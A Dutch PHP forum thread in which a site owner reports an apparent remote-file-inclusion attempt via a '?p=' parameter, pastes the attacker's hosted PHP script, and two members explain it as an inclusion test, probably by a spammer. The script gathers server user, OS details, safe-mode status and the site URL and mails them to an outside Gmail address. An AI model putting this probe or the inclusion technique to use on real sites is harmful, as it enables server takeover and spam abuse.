hack poging ?

- Roland -

09/10/2009 20:54:00

Iemand probeert via de URL de volgende pagina uit te voeren in 1 van mijn websites.
dmv: ?p=......

http://topa.comandao.smtp.ru/flashcard/cmdscan.txt

Code (php)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "OFF"; }
else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("Produto = " . $UNAME . "
Seguran?a = " . $SafeMode . "
http://" . $delet . "

Muito obrigado por comprar o hehe1 com: delet");
$email = "xama.xama3@gmail.com";
$assunto = "CHEGOU INBOX NOVA";
$email1 = "xama.xama3@gmail.com";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}
?>

PHP hulp

24/05/2012 20:38:34

Gesponsorde koppelingen:

Moderator

Roel van de Water

09/10/2009 21:01:00

Waarschijnlijk heeft een hacker geprobeerd te testen of jij pagina's include met GET. Hij wil zo dus de content van die pagina (waarschijnlijk een controlepaneel o.d.) in jouw pagina includen om zo de controle over te nemen. Pas hiermee wel even goed op.

- SanThe -

09/10/2009 21:30:00

Hij probeert of ie zo een mail kan versturen. Waarschijnlijk een spammer dus.

PHPhulp is een Nederlandstalige PHP community sinds 2002. Je vindt hier PHP tutorials, PHP scripts, PHP boeken en nog veel meer. Alles is geheel gratis!